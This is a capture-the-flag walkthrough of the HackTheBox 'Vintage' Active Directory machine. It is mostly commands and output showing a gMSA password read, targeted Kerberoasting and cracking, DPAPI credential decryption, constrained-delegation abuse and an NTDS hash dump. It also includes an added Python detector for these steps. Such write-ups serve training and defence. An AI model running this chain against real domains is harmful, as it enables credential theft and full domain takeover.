Enumeration
As is common in real-life Windows pentests, you start the Vintage box with credentials for the following account: P.Rosa / Rosaisbest123
Nmap Scan
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49667/tcp open unknown
49670/tcp open unknown
49681/tcp open unknown
49689/tcp open unknown
49708/tcp open unknown
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $ nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985 -sCV 10.129.124.148 -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Active Directory LDAP (Domain: vintage.htb)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Active Directory LDAP (Domain: vintage.htb)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Summary
* Open ports: 53,88,135,139,389,445,464,593,636,3268,3269,5985
* Services: DNS - Kerberos - RPC - LDAP - LDAPS - SMB - WinRM
* Important notes: Domain: vintage.htb
hosts file
Update the hosts file so the DC's short name and FQDN resolve; Kerberos authentication depends on the FQDN, so this avoids issues when authenticating to the domain later.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $sudo sh -c "echo '10.129.124.148 dc01 vintage.htb dc01.vintage.htb' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $tail -n1 /etc/hosts
10.129.124.148 dc01 vintage.htb dc01.vintage.htb
DNS Enumeration
Zone transfer failed. Note that both commands below query vintange.htb (a typo for vintage.htb), so this result does not actually rule out AXFR on the real zone.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $dig axfr @$ip vintange.htb
; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> axfr @10.129.124.148 vintange.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $dig axfr @$ip dc01.vintange.htb
; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> axfr @10.129.124.148 dc01.vintange.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
RPC & SMB Enumeration
Every time I connect to RPC with invalid credentials, it normally gives me ACCESS_DENIED, but this time the error message is an unusual one:
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $rpcclient -U "%" $ip
Cannot connect to server. Error was NT_STATUS_NOT_SUPPORTED
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $rpcclient -U "%" $ip -c enumdomusers
Cannot connect to server. Error was NT_STATUS_NOT_SUPPORTED
The same thing happens with SMB using netexec.
Kerberos & LDAP Enumeration
The NT_STATUS_NOT_SUPPORTED error means NTLM authentication is disabled on the domain, so I have to use Kerberos authentication instead.
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap dc01 -u P.Rosa -p Rosaisbest123 -d vintage.htb -k --admin-count
LDAP dc01 389 dc01.vintage.htb [+] vintage.htb\P.Rosa:Rosaisbest123
LDAP dc01 389 dc01.vintage.htb Administrator
LDAP dc01 389 dc01.vintage.htb Administrators
LDAP dc01 389 dc01.vintage.htb Print Operators
LDAP dc01 389 dc01.vintage.htb Backup Operators
LDAP dc01 389 dc01.vintage.htb Replicator
LDAP dc01 389 dc01.vintage.htb L.Bianchi_adm
I note L.Bianchi_adm as a high-value target (the --admin-count filter lists objects with adminCount set), then continue enumerating.
Getting all users in the domain along with their description field, then checking for PKI (AD CS), LDAP signing and MachineAccountQuota:
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap dc01 -u P.Rosa -p Rosaisbest123 -d vintage.htb -k -M adcs -M ldap-checker -M maq
LDAP dc01 389 dc01.vintage.htb [+] vintage.htb\P.Rosa:Rosaisbest123
ADCS dc01 389 dc01.vintage.htb [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
LDAP-CHE... dc01 389 dc01.vintage.htb [-] [Errno -2] Name or service not known
LDAP-CHE... dc01 389 dc01.vintage.htb LDAP Signing NOT Enforced!
MAQ dc01 389 dc01.vintage.htb [*] Getting the MachineAccountQuota
MAQ dc01 389 dc01.vintage.htb MachineAccountQuota: 0
Password reuse failed: spraying Rosaisbest123 across the user list only works for P.Rosa. Note that svc_sql returns KDC_ERR_CLIENT_REVOKED instead of KDC_ERR_PREAUTH_FAILED, which indicates the account is disabled or locked rather than a wrong password.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap dc01 -u users.list -p Rosaisbest123 -d vintage.htb -k --continue-on-success
LDAP dc01 389 dc01.vintage.htb [*] x64 (name:dc01.vintage.htb) (domain:vintage.htb) (signing:True) (SMBv1:False)
LDAP dc01 389 dc01.vintage.htb [-] vintage.htb\L.Bianchi_adm:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP dc01 389 dc01.vintage.htb [-] vintage.htb\C.Neri_adm:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP dc01 389 dc01.vintage.htb [-] vintage.htb\svc_ark:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP dc01 389 dc01.vintage.htb [-] vintage.htb\svc_ldap:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP dc01 389 dc01.vintage.htb [-] vintage.htb\svc_sql:Rosaisbest123 KDC_ERR_CLIENT_REVOKED
LDAP dc01 389 dc01.vintage.htb [+] vintage.htb\P.Rosa:Rosaisbest123
LDAP dc01 389 dc01.vintage.htb [-] vintage.htb\C.Neri:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP dc01 389 dc01.vintage.htb [-] vintage.htb\G.Viola:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP dc01 389 dc01.vintage.htb [-] vintage.htb\L.Bianchi:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP dc01 389 dc01.vintage.htb [-] vintage.htb\R.Verdi:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP dc01 389 dc01.vintage.htb [-] vintage.htb\M.Rossi:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
With a domain user credential, I can use bloodhound.py to dump the LDAP data for further enumeration, then ingest the zip file into BloodHound CE.
`FS01` is a member of PRE-WINDOWS 2000 COMPATIBLE ACCESS@VINTAGE.HTB. From the post, a computer account created with the pre-Windows 2000 option has its own lowercase name as its password. Confirming it with netexec:
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap 10.129.232.23 -u 'fs01$' -p fs01 -k
LDAP 10.129.232.23 389 dc01.vintage.htb [+] vintage.htb\fs01$:fs01
With the fs01$ computer account, I can extract the gMSA secret hash because it holds the ReadGMSAPassword privilege over GMSA01$. First get a Kerberos ticket for fs01$, then point the KRB5CCNAME variable at it and extract the gMSA secrets with bloodyAD:
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $kinit 'fs01$'
Password for fs01$@VINTAGE.HTB: fs01
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: fs01$@VINTAGE.HTB
Valid starting Expires Service principal
12/01/2024 09:23:42 12/01/2024 19:23:42 krbtgt/VINTAGE.HTB@VINTAGE.HTB
renew until 12/02/2024 09:23:40
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $KRB5CCNAME=/tmp/krb5cc_1000 bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip dc01 -k get object 'GMSA01$' --attr msDS-ManagedPassword
distinguishedName: CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:54311f0ed05b807a7axxxxxxxxxxxxxxx
msDS-ManagedPassword.B64ENCODED: c6qwf6x+EXiEYKGhCu/wTBcnxxxxxxxxxxxxxxxxxxxxxxCaIhn2MobwBxF4Q6fd3W5P13wvh2Jf/Wp2WHsjIEjkbF0duDHoCBAK31Q+BoQg0eUHbsRcksNrkLcPtkZ5eUhK+TzgpXeFKt0VCOWFkAOStKE1H5PDfUGoC2xuP+Tceg7iV0IcMBaR8Db3UgqaqP2LLRiimuL6ZO4xl6sSRKrdRQEQOR7L9fFw9JW7myCsbj2TPxFc5WaMQtWi456OvwBQn4jhdty5tSjv2uMlcq+sQMz60voxH6sClACPGKJMCr2FNVJP6dd1GTdvh6n5Dbh/yhHCAF8UzYeGXv2Nx3Dw==
Get a Kerberos ticket for the GMSA01$ account using the extracted NT hash:
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $impacket-getTGT vintage.htb/'gmsa01$'@dc01 -hashes :54311f0ed05b807a7aaf5943b595f224
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Saving ticket in gmsa01$@dc01.ccache
GMSA01$ can add itself or any user to the ServiceManagers group, so I add P.Rosa to that group, because I have his password and it is easier to move around when you have a password :))
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $KRB5CCNAME=`pwd`/'gmsa01$@dc01.ccache' bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip dc01 -k add groupMember "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" P.Rosa
[+] P.Rosa added to CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB
Membership in the ServiceManagers group grants the ability to change the password of three service users or assign a fake SPN to them. I will try targeted Kerberoasting against the svc_sql account; it has to be enabled first, because the KDC will not issue a service ticket (ST) for a disabled account (that is the KDC_ERR_CLIENT_REVOKED seen during the spray). Using PowerView.py I assign an SPN to it and then enable the account (note that writing userAccountControl=512 replaces the whole flag set with NORMAL_ACCOUNT, clearing any other flags that were set):
(LDAP)-[dc01.vintage.htb]-[VINTAGE\P.Rosa]
PV > Set-DomainObject -Identity svc_sql -Set serviceprincipalname='service/dc01.vintage.htb'
[2024-12-01 10:13:49] [Set-DomainObject] Success! modified attribute serviceprincipalname for CN=svc_sql,OU=Pre-Migration,DC=vintage,DC=htb
(LDAP)-[dc01.vintage.htb]-[VINTAGE\P.Rosa]
PV > Set-DomainObject -Identity svc_sql -Set userAccountControl=512
[2024-12-01 10:18:27] [Set-DomainObject] Success! modified attribute useraccountcontrol for CN=svc_sql,OU=Pre-Migration,DC=vintage,DC=htb
Perform a Kerberoasting attack to obtain the ST hash:
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap dc01 -u p.rosa -p Rosaisbest123 -k --kerberoasting kerberos.hash
LDAP dc01 389 dc01.vintage.htb [+] vintage.htb\p.rosa:Rosaisbest123
LDAP dc01 389 dc01.vintage.htb Bypassing disabled account krbtgt
LDAP dc01 389 dc01.vintage.htb [*] Total of records returned 1
LDAP dc01 389 dc01.vintage.htb sAMAccountName: svc_sql memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb pwdLastSet: 2024-12-01 10:12:04.583550 lastLogon:<never>
LDAP dc01 389 dc01.vintage.htb $krb5tgs$23$*svc_sql$VINTAGE.HTB$vintage.htb/svc_sql*$blob...
Crack the hash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $hashcat -m 13100 kerberos.hash /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*svc_sql$VINTAGE.HTB$vintage.htb/svc_sql*$5c8b7f808a8cf1a4eb8cdc495b8f71b9$13310d68a29e5f44f74d55c066d19a6d3f187906b54c866fd860784de403813e9a8772ec270e8734b4d89d04dc51a4e569c92beac67729b043471fe387c8659a945e9893e3ebafe0b97e6e8ee912354186321c1029a5b9aca893aa5a6e2197493250e38b1ef7a0cc554b70dc16da09d29207172e7ef3715a41c5f36ce3d5bc6801a5ff7a382c0217e43c2f8daaf84e742e17a..snip..5:Zerxxxxxxx
Session..........: hashcat
Status...........: Cracked
Spraying the cracked password reveals that C.Neri has the same one. Since C.Neri is in Remote Management Users, I will access the machine with evil-winrm, but first I need a Kerberos ticket for him.
To perform Kerberos authentication from Linux, you must configure /etc/krb5.conf first:
[libdefaults]
default_realm = VINTAGE.HTB
[realms]
VINTAGE.HTB = {
kdc = dc01.vintage.htb
admin_server = dc01.vintage.htb
default_domain = vintage.htb
}
[domain_realm]
.vintage.htb = VINTAGE.HTB
vintage.htb = VINTAGE.HTB
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $kinit C.Neri
Password for C.Neri@VINTAGE.HTB:
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: C.Neri@VINTAGE.HTB
Valid starting Expires Service principal
12/01/2024 10:27:07 12/01/2024 20:27:07 krbtgt/VINTAGE.HTB@VINTAGE.HTB
renew until 12/02/2024 10:27:02
Access the machine via WinRM using Kerberos authentication:
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $KRB5CCNAME=/tmp/krb5cc_1000 evil-winrm -i dc01 -r vintage.htb
*Evil-WinRM* PS C:\Users\C.Neri\Desktop> type user.txt
35cb0ccde18da32e0366xxxxxxxxxxxxxxxxx
User Flag: 35cb0ccde18da32e0366xxxxxxxxxxxxxxxxx
Lateral Movement
Inside C.Neri's profile folder there are DPAPI-encrypted credentials.
DPAPI stands for Data Protection API, Microsoft's mechanism for encrypting user secrets. A credential blob can be decrypted with the master key of the user who encrypted it, and that master key is itself protected with the user's password.
Usual location of DPAPI credential blobs:
%USERPROFILE%\AppData\Roaming\Microsoft\Credentials
%USERPROFILE%\AppData\Local\Microsoft\Credentials
Master key location:
%USERPROFILE%\AppData\Roaming\Microsoft\Protect\<SID>\
JokerShell C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials> ls -Force
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 6/7/2024 5:08 PM 430 C4BB96844A5C9DD45D5B6A9859252BA6
We can base64-encode this encrypted credential, then transfer it to our Windows VM along with the master key files to decrypt it locally.
After doing so, we use mimikatz.exe with dpapi::masterkey first to recover the master key (using the user's password and SID), then dpapi::cred to decrypt the credential with the obtained master key.
dpapi::masterkey /in:C:\Users\Dark_Man\Downloads\4dbf04d8-529b-4b4c-b4ae-8e875e4fe847 /sid:S-1-5-21-4024337825-2033394866-2055507597-1115 /password:Zerxxxxxxx /protected
dpapi::masterkey /in:C:\Users\Dark_Man\Downloads\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b /sid:S-1-5-21-4024337825-2033394866-2055507597-1115 /password:Zerxxxxxxx /protected
[masterkey] with password: Zerxxxxxxx (protected user)
key : 55d51b40d9aa74e8cdc44a6d24a25xxxxxxxxxxxxxxxxxxxxxxxxxx048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f
sha1: 637b40612daf4b1bd99785833479898aeb6d9739
dpapi::cred /in:C:\Users\Dark_Man\Downloads\C4BB96844A5C9DD45D5B6A9859252BA6 /masterkey:55d51b40d9aa74e8cdc44a6d24a25xxxxxxxxxxxxxxxxxxxxxxxxxx048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f
Decrypting Credential:
* masterkey : 55d51b40d9aa74e8cdc44a6d24a25xxxxxxxxxxxxxxxxxxxxxxxxxx048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 000000da - 218
credUnk0 : 00000000 - 0
Type : 00000001 - 1 - generic
Flags : 00000000 - 0
LastWritten : 6/7/2024 3:08:23 PM
unkFlagsOrSize : 00000030 - 48
Persist : 00000003 - 3 - enterprise
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : LegacyGeneric:target=admin_acc
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : vintage\c.neri_adm
CredentialBlob : Uncr4ckxxxxxxxxxxxd0312
Attributes : 0
Privilege Escalation
Attack outline:
* With GenericWrite on DELEGATEDADMINS, I can add any user to this group.
* With DELEGATEDADMINS privileges, I can perform constrained delegation and request a ticket for CIFS.
* With this ticket, I can dump the NTDS.DIT database with secretsdump.py.
There is a script running on the box that resets any change made by players, so I will repeat the earlier steps here to make things fast.
Add P.Rosa to the SERVICEMANAGERS group (previous step):
KRB5CCNAME=`pwd`/'gmsa01$@dc01.ccache' bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip dc01 -k add groupMember "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" P.Rosa
Set an SPN on svc_sql using the proper Service/FQDN syntax, and enable the account if it has been disabled again:
Set-DomainObject -Identity svc_sql -Set userAccountControl=512
Set-DomainObject -Identity svc_sql -Set serviceprincipalname='MSSQLSvc/dc01.vintage.htb'
or, with bloodyAD:
KRB5CCNAME=`pwd`/p.rosa.ccache bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip dc01 -k set object 'SVC_SQL' servicePrincipalName -v 'MSSQLSvc/dc01.vintage.htb'
Abuse the GenericWrite privilege to add svc_sql to DELEGATEDADMINS:
KRB5CCNAME=`pwd`/c.neri_adm.ccache bloodyAD -k --host dc01.vintage.htb --dc-ip dc01 -d 'VINTAGE.HTB' add groupMember 'DELEGATEDADMINS' 'svc_sql'
Perform the constrained delegation attack and request a CIFS ticket:
getST.py -spn 'cifs/dc01.vintage.htb' -impersonate 'dc01$' 'vintage.htb/svc_sql':'Zerxxxxxxx' -k
Export the ticket to KRB5CCNAME and dump NTDS using netexec. Note: I will use the L.BIANCHI_ADM DA user instead of the normal Administrator user.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc smb dc01 -d vintage.htb -k --use-kcache --ntds --user L.BIANCHI_ADM
SMB dc01 445 dc01 [+] vintage.htb\dc01$ from ccache
SMB dc01 445 dc01 L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:8e83e02f54e85de52xxxxxxxxxxxx4:::
impacket-getTGT vintage.htb/l.bianchi_adm@dc01 -hashes :8e83e02f54e85dexxxxxxxxxxxxx
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc smb dc01 -k --use-kcache -d vintage.htb
SMB dc01 445 dc01 [+] vintage.htb\l.bianchi_adm from ccache (Pwn3d!)
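A defender-side view of the chain above, as an added example that is not part of the original write-up: a small Python detector run over constructed, simplified Security-event records (our own field names, not raw EVTX) that flags the SPN write and account enable on svc_sql (event 5136), the additions to ServiceManagers and DelegatedAdmins (4728), the RC4 service-ticket request that is the Kerberoast signal (4769 with ticket encryption type 0x17) and the S4U2Proxy request carrying transited services (4769).

```python
# Added example, not from the write-up: spot this chain in simplified,
# constructed Security-event records (field names are our own, not raw EVTX).
ACCOUNTDISABLE = 0x0002   # userAccountControl bit; the 514 -> 512 write clears it
RC4_HMAC = 0x17           # 4769 TicketEncryptionType requested by classic Kerberoasting
WATCHED_GROUPS = {"ServiceManagers", "DelegatedAdmins"}   # groups abused above


def analyse(events):
    """events: (event_id, fields) tuples -> list of (finding, subject, detail)."""
    out = []
    for event_id, f in events:
        if event_id == 5136 and f.get("attribute") == "servicePrincipalName":
            # SPN written onto a plain user account: targeted-Kerberoast setup
            out.append(("spn_written", f["object"], f["value"]))
        elif event_id == 5136 and f.get("attribute") == "userAccountControl":
            old, new = int(f["old"]), int(f["value"])
            if old & ACCOUNTDISABLE and not new & ACCOUNTDISABLE:
                out.append(("account_enabled", f["object"], f["actor"]))
        elif event_id == 4728 and f["group"] in WATCHED_GROUPS:
            out.append(("watched_group_add", f["group"], f["member"]))
        elif event_id == 4769:
            svc = f["service"]
            if f["etype"] == RC4_HMAC and not svc.startswith("krbtgt"):
                out.append(("rc4_service_ticket", svc, f["client"]))
            if f.get("transited"):   # S4U2Proxy: constrained delegation in use
                out.append(("delegation_ticket", svc, f["transited"]))
    return out


# Constructed sample mirroring the steps of this write-up; not real logs.
SAMPLE = [
    (4728, {"group": "ServiceManagers", "member": "P.Rosa", "actor": "gmsa01$"}),
    (5136, {"object": "svc_sql", "attribute": "servicePrincipalName",
            "value": "MSSQLSvc/dc01.vintage.htb", "actor": "P.Rosa"}),
    (5136, {"object": "svc_sql", "attribute": "userAccountControl",
            "old": "514", "value": "512", "actor": "P.Rosa"}),
    (4769, {"client": "P.Rosa", "service": "svc_sql", "etype": 0x17}),
    (4769, {"client": "C.Neri", "service": "dc01$", "etype": 0x12}),   # benign AES ST
    (4728, {"group": "DelegatedAdmins", "member": "svc_sql", "actor": "c.neri_adm"}),
    (4769, {"client": "dc01$", "service": "cifs/dc01.vintage.htb", "etype": 0x12,
            "transited": "svc_sql@VINTAGE.HTB"}),
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE):
        print(*finding)
```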
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $evil-winrm -i dc01 -r vintage.htb
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
a35039cb0106fdd70bcxxxxxxxxxxxxxx
Root Flag: a35039cb0106fdd70bcxxxxxxxxxxxxxx